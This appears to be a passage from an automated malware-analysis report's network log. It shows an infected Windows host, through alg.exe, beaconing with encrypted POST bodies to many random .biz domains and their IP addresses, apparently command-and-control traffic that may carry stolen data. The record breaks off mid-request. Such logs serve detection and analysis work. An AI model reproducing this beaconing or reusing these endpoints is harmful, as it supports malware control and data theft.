                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:43.923266888 CET | 842 | OUT | Data Raw: 8f ad c7 0c af db ca 97 3e 03 00 00 b5 ee a1 d4 89 b6 9f 00 4a 49 50 43 6f bf fc a0 1d b6 fa 62 d8 2a cc 34 90 94 84 00 c8 a3 71 8b 0e 8c 7a ae bc 85 19 5a 34 dc ee d6 c4 31 2c 75 5c c9 72 4f 31 d2 c3 e7 3d f0 c0 28 3a dc 49 3f 82 b4 38 e9 06 fb
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: >JIPCob*4qzZ41,u\rO1=(:I?8(HrmAx[%PO|ezY"02:CM9%^o4q<9{C'^w3jPq>fSZI!mR'M~<b0%]^;^{zCb,"I
Nov 18, 2024 09:58:44.189199924 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port
122 | 192.168.2.7 | 50101 | 47.129.31.212 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:44.209769964 CET | 348 | OUT | POST /qxbbm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:44.209788084 CET | 842 | OUT | Data Raw: 24 bb 7f 4c 8b 0e 30 72 3e 03 00 00 55 f9 b6 a2 dc 4e 58 6c 36 85 fa 3b 94 67 22 1e 99 7c 3f 54 ba 48 03 1e f6 d9 4a 24 a9 51 2c ef 65 c2 2e 56 37 61 87 3d e5 c7 da bf 61 95 13 9b 9a 87 bd d1 ef eb 33 6d 10 f8 a8 9d b6 72 05 cc ce a1 71 6c 8d 17
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: $L0r>UNXl6;g"|?THJ$Q,e.V7a=a3mrqlrSb'Lev?S,K,-X@=4ORvZNAZ]%fOV2[B?z(8X..k4NG7!i$`;NYi/b<1nc}
Nov 18, 2024 09:58:45.682796955 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4ebce090d009c3640ce3694a7e4b87d0|155.94.241.187|1731920325|1731920325|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.7 | 50102 | 3.94.10.34 | 80 | 5368 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:44.773525000 CET | 355 | OUT | POST /vhxrnsynbee HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:44.773566961 CET | 778 | OUT | Data Raw: 78 dd fe 60 db b5 b8 ae fe 02 00 00 73 6c 92 5d 6a 9a 54 eb 00 fe 92 1c 38 a1 85 c4 d1 9f aa 15 19 45 68 c8 c9 d4 91 9e 93 e2 e3 0c 43 65 31 93 9b 18 c3 ec 53 99 dc f7 a0 4a 36 cd 09 47 92 f9 f9 71 02 d1 35 c2 73 ab a1 51 ee da fb 8a d2 45 f2 38
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: x`sl]jT8EhCe1SJ6Gq5sQE81A8G4J :%hW\XO"=fx4s1* NN?(Mej2*5ziojC#`25L[kXIMRS4pJKA
Nov 18, 2024 09:58:45.436223030 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=880fc585cd326c9ff6f9f34890d4b118|155.94.241.187|1731920325|1731920325|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
124         192.168.2.7  50103        34.211.97.45    80
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:58:45.718875885 CET  349  OUT  POST /tgkqrcfn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:45.718875885 CET  842  OUT  Data Raw: 7b 73 e3 3b 29 a9 bc 7e 3e 03 00 00 38 d4 ec c8 0e 58 bb d9 9b 65 a3 f3 34 96 8f 17 8d 47 30 3b 54 a0 40 04 fd c4 51 c3 4b 88 d7 15 a7 c5 29 da d6 c1 6c 41 ae f2 98 c5 34 a3 1d 8f c6 e8 90 d6 a8 6a 0a f5 a8 0b cb 7b 1a 9a 66 7c bb 10 80 13 dc 53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {s;)~>8Xe4G0;T@QK)lA4j{f|SUC6@]?-y?H/;Z\CpF6[?+_mguDft7Jpw4|v4%kfP[A"+u~2h(9-f{2}ym1c|
Nov 18, 2024 09:58:46.548098087 CET  413  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=062e1dcd1a8079011682815400bbf5b3|155.94.241.187|1731920326|1731920326|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
125         192.168.2.7  50104        35.164.78.200   80                5368  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:58:46.079933882 CET  349  OUT  POST /gajxy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:46.079976082 CET  778  OUT  Data Raw: 80 d9 3c bb 7d ed 29 c0 fe 02 00 00 aa f0 0e db a3 cf b3 40 d0 fd ab 76 6b f2 ff 46 b3 42 23 44 ee 75 da 59 bc 40 c2 0b b0 67 45 57 5a e3 20 13 6b e5 f8 8b 67 c4 32 3a e1 06 43 e1 71 bc ec 7f 75 65 20 6f 6c cd 3e ee af a8 4c 8d a4 91 ea c0 93 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <})@vkFB#DuY@gEWZ kg2:Cque ol>LlfW*L3?9?]e9i& tmiat>r$cFP:>3q.Gz#7w]1^]+nx`&qe,0;F"f|T%M!Q)@
Nov 18, 2024 09:58:46.907140970 CET  416  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=b3bde7807a9f6d36e355776f69b7f7d4|155.94.241.187|1731920326|1731920326|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
126         192.168.2.7  50105        47.129.31.212   80
Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:58:46.567945957 CET  358  OUT  POST /xcjwbjksxdykmrix HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:46.568195105 CET  842  OUT  Data Raw: 3f 9a d4 f8 06 99 19 a2 3e 03 00 00 58 e3 37 52 c5 de 3c cc 15 cc bb 30 82 f8 01 17 c5 65 05 d0 fd bd 29 54 0e 9e 67 90 33 51 c3 09 fa ba 4e ac 06 f8 7b dd ea 6f 81 ba 92 9f 85 a9 c2 8b 66 70 25 7c ec 5a 74 c3 f1 c9 70 15 4b e1 d5 5a 97 7c c5 85
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ?>X7R<0e)Tg3QN{ofp%|ZtpKZ|6[]=<ojQs,(Gmc$wodpyo[? l&)o;z'#JQ2,A%$.=".K#XU$QG1X9ic)
Nov 18, 2024 09:58:48.058963060 CET  414  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=d3db503bcbf792e34c2b8d11382b56c4|155.94.241.187|1731920327|1731920327|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.7 | 50106 | 18.141.10.107 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:47.396617889 CET | 353 | OUT | POST /jarjdamitgg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:47.396617889 CET | 778 | OUT | Data Raw: 88 d6 7a 15 1e 25 99 d1 fe 02 00 00 7c e5 0e a5 c7 05 7f f4 4b aa 94 a4 db ef f7 7c 7a 72 72 73 0a 4c 0d fc 4a 47 46 9c 99 27 86 bf 14 7a 76 62 9a e4 86 22 af 75 43 1c 1c 77 e6 a8 9a 91 6e 33 cc e3 df 09 45 9d 3b 29 b3 0a fa e8 f7 de 9b f1 ef 60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: z%|K|zrrsLJGF'zvb"uCwn3E;)`"(!X(vyXj?8]hKKZ/X.xN2z,-j<n$=po:)K2PK4*c"a3|M9k+R45;[J)QL
Nov 18, 2024 09:58:48.861454964 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=19d94d89db08e42540628342b65771d1|155.94.241.187|1731920328|1731920328|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
128 | 192.168.2.7 | 50107 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:48.076498985 CET | 348 | OUT | POST /ndn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:48.076572895 CET | 842 | OUT | Data Raw: 92 56 6f e8 5b dd 7c 1c 3e 03 00 00 40 0d 68 52 0e 9d 34 08 db fe 96 ac 50 bf d5 17 a5 f4 52 18 5d 6c a5 64 88 17 6f de 7f 13 88 b1 20 ce 00 17 eb cf 7f f7 8d d9 1e af 89 62 0d 73 5d cb 0e 6a 73 47 81 9b 21 53 23 e3 15 8b 9a 9c 8d 61 ea ed 25 23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Vo[|>@hR4PR]ldo bs]jsG!S#a%#F<ENO?Y2|o&x1[Z6n032^nhz6}EI@'+NL+Gx/ %ROSY's@a{#v<6^O9?HWtz
Nov 18, 2024 09:58:48.745724916 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e940b966cb11c4443ba606645b3787ec|155.94.241.187|1731920328|1731920328|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
129 | 192.168.2.7 | 50108 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:48.779853106 CET | 352 | OUT | POST /qdigkbbwou HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:48.779870987 CET | 842 | OUT | Data Raw: 59 ad 65 10 c6 f3 32 0f 3e 03 00 00 47 5c 39 a4 f8 11 8c 03 1e a6 e1 1c 2e 0b 59 53 65 bc 04 a2 09 d9 94 45 95 a4 b4 5a 8e dd 84 df 12 b2 d8 a6 cb c6 4a f0 98 d7 44 12 10 c5 fe de a2 a1 10 88 f2 ba c1 03 2a 63 5a 68 1c 76 14 f1 ae af 0c aa b7 0c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Ye2>G\9.YSeEZJD*cZhvi^JU/7DpvwWq;.?zE'W^q13)GTOR'Fp}Yq]$8tCU ^}'NfdY9_,i=Jpu'w-`
Nov 18, 2024 09:58:50.212913990 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8da43712577f17c1898e47fdcc0ce0fa|155.94.241.187|1731920329|1731920329|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.7 | 50109 | 208.100.26.245 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:49.288196087 CET | 361 | OUT | POST /jvsdbpglagvynifq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:49.288228989 CET | 778 | OUT | Data Raw: f0 b5 ab e3 20 2f 5f a6 fe 02 00 00 ea 24 3d 80 bd a7 41 86 8f 5b 30 33 91 55 c3 03 ce dc b3 74 d2 a8 10 ad 22 04 5f 35 e9 43 62 81 29 01 23 c3 97 04 17 51 c9 b4 f5 fd ac 6b ef 6a 1e c3 2f e4 b0 45 5b bf 24 80 e5 29 9a 84 78 82 46 2c e8 75 49 f3
Data Ascii: /_$=A[03Ut"_5Cb)#Qkj/E[$)xF,uIZ_[_r/.Bz8-2Uwv8epg*m6D~Lv{ubg(\ bm=C? j'|cE(yjkrH.E|f*~NKD!
Nov 18, 2024 09:58:49.932056904 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 18 Nov 2024 08:58:49 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:58:50.006220102 CET | 357 | OUT | POST /yeixpxtqdbgl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:50.006247044 CET | 778 | OUT | Data Raw: 50 64 61 ea 3c 32 82 2b fe 02 00 00 f4 cc 17 af 63 30 95 41 0e 71 e5 0c f4 0d 05 46 c4 10 16 4f 03 12 49 73 51 1f 01 c5 80 0a 3c 54 dd 57 ab 91 d9 dc 8b a9 bc 79 f3 cc 8c b0 da 3a ef a3 9c 67 29 a2 c8 a9 06 47 83 87 29 2c dd 23 65 62 52 02 01 58
Data Ascii: Pda<2+c0AqFOIsQ<TWy:g)G),#ebRX(XDQS0k"8'Jm`@l^ec/sQpb9Puf3U^'5q"s'hTvj{MvK+4NfoN5~E>r*^~f`}vnH`u,5J0tD[*l
Nov 18, 2024 09:58:50.155575037 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 18 Nov 2024 08:58:50 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
131 | 192.168.2.7 | 50110 | 34.246.200.160 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:50.232249022 CET | 348 | OUT | POST /pnw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:50.232268095 CET | 842 | OUT | Data Raw: 16 0e 09 20 b4 a1 51 88 3e 03 00 00 86 8e a9 26 74 91 c8 34 74 a9 ec ff 9d 9e e5 84 79 a2 2b a1 e0 e2 bb 99 b5 3f b7 27 87 ca 25 36 35 f7 d9 92 a2 fc 1f 31 2a b2 90 79 10 68 43 61 91 c8 87 54 5b 34 46 87 4a 6d c9 49 6a 82 09 36 e5 48 7b 20 73 b0
Data Ascii: Q>&t4ty+?'%651*yhCaT[4FJmIj6H{ s#&N'OWQCl^H;af6 0lR]K+UJB)hT}Z5"V%@HrY#LI{E8XH*oV6
Nov 18, 2024 09:58:51.194924116 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d5f4fa8daf749d1d3d3b20eacb27c4ad|155.94.241.187|1731920331|1731920331|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.7 | 50111 | 44.221.84.105 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:50.605565071 CET | 359 | OUT | POST /xprpgfukortnennm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: reczwga.biz
